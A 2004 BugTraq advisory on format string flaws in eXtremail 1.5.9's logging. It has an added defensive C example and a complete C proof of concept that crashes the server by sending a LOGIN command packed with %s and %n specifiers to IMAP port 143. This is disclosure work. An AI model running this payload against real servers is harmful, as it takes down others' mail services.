BugTraq
Remote Format String Vulnerabilities in eXtremail Apr 25 2004 02:40PM
Luca Ercoli (luca e seeweb com)


Package: eXtremail

Auth: http://www.extremail.com/

Version(s): 1.5.9 (current release)

Vulnerability: Format String

What's eXtremail:

eXtremail is a Unix mail server that supports the SMTP, POP3 and IMAP protocols. It includes support for virtual domains, spoofing attack, SSL connection and Antivirus checking.

Vulnerability Description:

Format string vulnerabilities exist in the logging routines of eXtremail, allowing remote attackers to gain root privileges.

This security flaw can be exploited by supplying a specially crafted string containing format specifiers to various SMTP, POP and IMAP commands.

The vulnerability has been reported to affect some previous versions (BugTraq ID: 2908) and has been reintroduced in the latest version of eXtremail.

Here is a snippet of eXtremail's log:

25/04/2004 - 16:26:29 -> ----------------------------------------------
25/04/2004 - 16:26:29 -> - IMAP - Incoming IMAP connection -
25/04/2004 - 16:26:29 -> ----------------------------------------------
25/04/2004 - 16:26:29 -> IMAP - IMAP connection: 192.168.0.150
25/04/2004 - 16:26:29 -> IMAP - Error: User %s25/04/2004 - 16:26:29 -> SIGN - Signal: segmentation fault received
25/04/2004 - 16:26:29 -> SIGN - Signal: segmentation fault received

After a successful denial of service attack, eXtremail must be restarted to regain its functionality (Smtpd, Pop3d, Imapd, Remt).
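
The logging flaw described above, shown as an added example that is not part of the original advisory and not eXtremail source code: a logger that uses client text as the format string, next to a fixed-format version, plus a small check that counts conversion specifiers in a logged field. The names log_event_unsafe, log_event, count_format_specifiers and the SHOW_VULNERABLE_PATTERN guard are hypothetical.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical logger modelled on the advisory's log lines; not eXtremail source. */

#ifdef SHOW_VULNERABLE_PATTERN
/* Vulnerable: client-controlled text reaches fprintf() as the format,
 * so "%s" and "%n" in a LOGIN argument are interpreted, not printed. */
void log_event_unsafe(FILE *log, const char *client_text)
{
    fprintf(log, client_text);
    fputc('\n', log);
}
#endif

/* Hardened: the format is a constant; client text is only ever an argument. */
int log_event(char *out, size_t outlen, const char *proto, const char *client_text)
{
    return snprintf(out, outlen, "%s - Error: User %s", proto, client_text);
}

/* Detection aid: count '%' conversions in a client-supplied field.
 * "%%" is a literal percent sign and is not counted. */
int count_format_specifiers(const char *s)
{
    int n = 0;
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {
            s++;
            continue;
        }
        if (s[1] != '\0')
            n++;
    }
    return n;
}

int main(void)
{
    /* Constructed sample: a user field made of conversion specifiers. */
    const char *user = "%s%s%s%s%s%s%s%s%s";
    char line[128];
    log_event(line, sizeof line, "IMAP", user);
    printf("%s\n", line);
    printf("format specifiers in user field: %d\n", count_format_specifiers(user));
    return 0;
}
```

With the fixed format the specifiers appear in the log as literal text, which is also what makes them easy to spot during log review.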

Proof of Concept:

------ eXtremail-kill.c --------

/**********************************************
 *             Proof of Concept               *
 *     eXtremail 1.5.x Denial of Service      *
 *                                            *
 *   Luca Ercoli <luca.e [at] seeweb.com>     *
 *   Seeweb http://www.seeweb.com             *
 *                                            *
 **********************************************/

#include <stdio.h>
#include <stdlib.h>     /* exit() */
#include <string.h>     /* memset(), strlen() */
#include <unistd.h>     /* close(), fork(), sleep() */
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define PORT 143
#define MAXRECVSIZE 100

int main(int argc, char *argv[]);
void crash(char *host,int TYPE);

int numbytes;

/* TYPE 0: read the banner and send the LOGIN line.
 * TYPE 1: only connect and read the banner (status check). */
void crash(char *host,int TYPE)
{
    int sockfd;
    char buf[MAXRECVSIZE];
    struct hostent *he;
    struct sockaddr_in their_addr;

    /* IMAP LOGIN command whose user and password fields are format specifiers */
    char poc[]="1 login %s%s%s%s%s%s%s%s%s %s%s%s%s%s%s%s%s%n%n%n\n";

    if ((he=gethostbyname(host)) == NULL)
    {
        perror("gethostbyname");
        exit(1);
    }

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
    {
        perror("socket");
        exit(1);
    }

    their_addr.sin_family = AF_INET;
    their_addr.sin_port = htons(PORT);
    their_addr.sin_addr = *((struct in_addr *)he->h_addr);
    memset(&(their_addr.sin_zero), '\0', 8);

    if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
    {
        perror("connect");
        exit(1);
    }

    /* Read the server greeting */
    if ((numbytes=recv(sockfd, buf, MAXRECVSIZE-1, 0)) == -1)
    {
        perror("recv");
        exit(1);
    }

    buf[numbytes] = '\0';

    if (TYPE == 0)
    {
        printf("[+] Server -> %s",buf);
        sleep(1);
        printf("\n[!] Sending malicious packet...\n");
        send(sockfd,poc, strlen(poc), 0);
        sleep(1);
        printf ("\n[+] Sent!\n");
    }

    close(sockfd);
}

int main(int argc, char *argv[])
{
    printf("\n\n eXtremail 1.5.x Denial of Service \n");
    printf("by Luca Ercoli <luca.e [at] seeweb.com>\n\n\n\n");

    if (argc != 2)
    {
        fprintf(stderr,"\nUsage -> %s hostname\n\n",argv[0]);
        exit(1);
    }

    crash(argv[1],0);

    numbytes=0;

    printf ("\n[+] Checking server status ...\n");

    /* The child's numbytes is a private copy after fork(); the parent's
     * copy is still 0 below, so the parent prints the message whether or
     * not the server answered. */
    if(!fork()) crash(argv[1],1);

    sleep(5);

    if (numbytes == 0) printf ("\n[!] Smtpd/Pop3d/Imapd/Remt crashed!\n\n\n");

    return 0;
}

-------------------------------

Solution:

No solution available at the moment.

Credits:

--

Luca Ercoli <luca.e [at] seeweb.com>

Seeweb http://www.seeweb.com
